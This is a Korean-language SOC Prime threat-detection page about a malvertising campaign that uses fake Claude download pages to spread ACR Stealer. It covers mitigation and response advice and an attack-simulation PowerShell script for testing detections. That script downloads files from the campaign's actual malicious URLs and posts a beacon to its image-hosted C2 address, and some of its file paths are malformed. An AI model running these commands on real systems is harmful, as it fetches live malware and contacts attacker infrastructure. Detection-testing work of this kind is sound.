SOC Prime Bias: 중간

26 May 2026 16:05 UTC
newspaper icon SANS 인터넷 스톰 센터

클로드 사칭 페이지가 ACR 스틸러를 배포할 수 있음

Author Photo
SOC Prime Team linkedin icon 팔로우
클로드 사칭 페이지가 ACR 스틸러를 배포할 수 있음
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


요약

위협 연구원들은 사용자를 가짜 Claude 다운로드 페이지로 리디렉션하는 악성 광고 캠페인을 확인했습니다. 이 사이트는 피해자의 운영 체제에 따라 서로 다른 페이로드를 전달하며, Windows 감염 체인은 ACRStealer의 배포로 이어집니다. 조사관들은 이 활동을 여러 개의 손상된 도메인과 감염 후 사용되는 명령 및 제어 서버와 연결시켰습니다. 이 캠페인은 페이로드 전달을 완료하기 위해 난독화된 URL과 PowerShell 스크립트에 의존합니다.

조사

분석가는 초기 가짜 Claude 페이지에서 시작하여 여러 리디렉션 URL을 통해 다양한 도메인에 호스팅된 활동을 추적했습니다. 감염 체인 동안에는 ZIP 아카이브, PowerShell 스크립트 및 JPEG 이미지가 다운로드된 후 명령 및 제어 도메인과 HTTPS 통신이 이루어졌습니다. 트래픽 분석을 통해 감염 후 네트워크 동작이 ACRStealer 계열의 인프라와 일치함이 확인되었습니다.

완화

조직은 네트워크 경계에서 식별된 악성 도메인과 URL을 차단해야 합니다. 광고 트래픽은 가짜 Claude 페이지나 유사한 사칭 유인책을 참조하는 악성 광고를 필터링해야 합니다. 엔드포인트 보호는 또한 ACRStealer 관련 동작과 의심스러운 PowerShell 실행을 탐지하도록 구성해야 합니다.

응답

방어자는 명령 및 제어 도메인에 대한 아웃바운드 연결을 모니터링하고 yw.enhanceblabber.cc 식별된 ZIP 아카이브 및 PowerShell 스크립트 다운로드에 경고를 설정해야 합니다. 관련 활동을 보이는 모든 호스트는 ACRStealer 아티팩트에 대한 포렌식 수집을 거쳐야 하며 타협이 확인되면 격리되어야 합니다.

공격 흐름

이 부분은 아직 업데이트 중입니다. 알림을 받으려면 가입하세요

알림 받기

시뮬레이션 실행

필수 사항: Telemetry & Baseline Pre-flight Check가 통과해야 합니다.

이유: 이 섹션은 탐지 규칙을 유발하도록 설계된 적들의 기술(TTP)의 정확한 실행을 자세히 설명합니다. 명령어와 서사는 식별된 TTP를 직접 반영하며 탐지 논리에 의해 예상되는 정확한 원격측정을 생성하도록 목표합니다.

  • 공격 내러티브 & 명령어:

    1. 초기 유인: 공격자는 링크가 포함된 피싱 이메일을 보냅니다 https://fairpoint29.com/. 피해자가 링크를 클릭하면 가짜 Claude 다운로드 페이지가 로드됩니다.
    2. 악성 다운로더 실행: 페이지는 자동으로 다운로드를 트리거하여 https://primemetricsa.com/1518925위장된 페이로드를 전달합니다.
    3. 2차 페이로드 검색: 다운로드된 스텁은 https://6ryuefl.creativecommunityinfo.art/Camel-91267b64-989f-49b4-89b4-9e015844d42d 와 접촉하여 전체 ACR Stealer 바이너리를 가져옵니다.
    4. C2 비콘: 실행 후 멀웨어는 https://i.ibb.co/Xx16sbMz/init-block.jpg 에 비콘을 게시합니다 (이미지 호스팅을 악용한 은밀한 C2 기법).

    각 단계는 정확한 도메인 and url Sigma 규칙에 정의된 값을 매칭하는 프록시 로그 항목을 생성하여 탐지 조건을 충족시킵니다.

  • 회귀 테스트 스크립트:

    # -------------------------------------------------
# ACR Stealer 배포 시뮬레이션 – 트리거 규칙
# -------------------------------------------------
# Step 1: 가짜 Claude 다운로드 페이지 (무해한 GET)
Invoke-WebRequest -Uri "https://fairpoint29.com/" -UseBasicParsing | Out-Null

# Step 2: 다운로더 바이너리 (작은 파일 다운로드로 시뮬레이션)
Invoke-WebRequest -Uri "https://primemetricsa.com/1518925" -OutFile "$env:TEMPloader.bin" -UseBasicParsing

# Step 3: 전체 페이로드 검색
Invoke-WebRequest -Uri "https://6ryuefl.creativecommunityinfo.art/Camel-91267b64-989f-49b4-89b4-9e015844d42d" `
  -OutFile "$env:TEMPacr_steler.bin" -UseBasicParsing

# Step 4: C2 비콘 (트래픽을 위장하기 위해 작은 이미지를 POSTing)
$body = [System.Text.Encoding]::UTF8.GetBytes("beacon")
Invoke-WebRequest -Uri "https://i.ibb.co/Xx16sbMz/init-block.jpg" `
  -Method Post -Body $body -ContentType "application/octet-stream" -UseBasicParsing | Out-Null
# -------------------------------------------------
# 시뮬레이션 끝
# -------------------------------------------------

  • 정리 명령어:

    # 다운로드한 아티팩트 제거
Remove-Item "$env:TEMPloader.bin" -ErrorAction SilentlyContinue
Remove-Item "$env:TEMPacr_steler.bin" -ErrorAction SilentlyContinue

# 잔여 항목 방지를 위한 DNS 캐시 플러시
ipconfig /flushdns

SOC Prime의 Detection as Code 플랫폼에 가입하세요 귀사의 비즈니스에 가장 중요한 위협에 대한 가시성을 개선하세요. 시작을 돕고 즉각적인 가치를 제공하기 위해 지금 SOC Prime 전문가와의 회의를 예약하세요.

무료 가입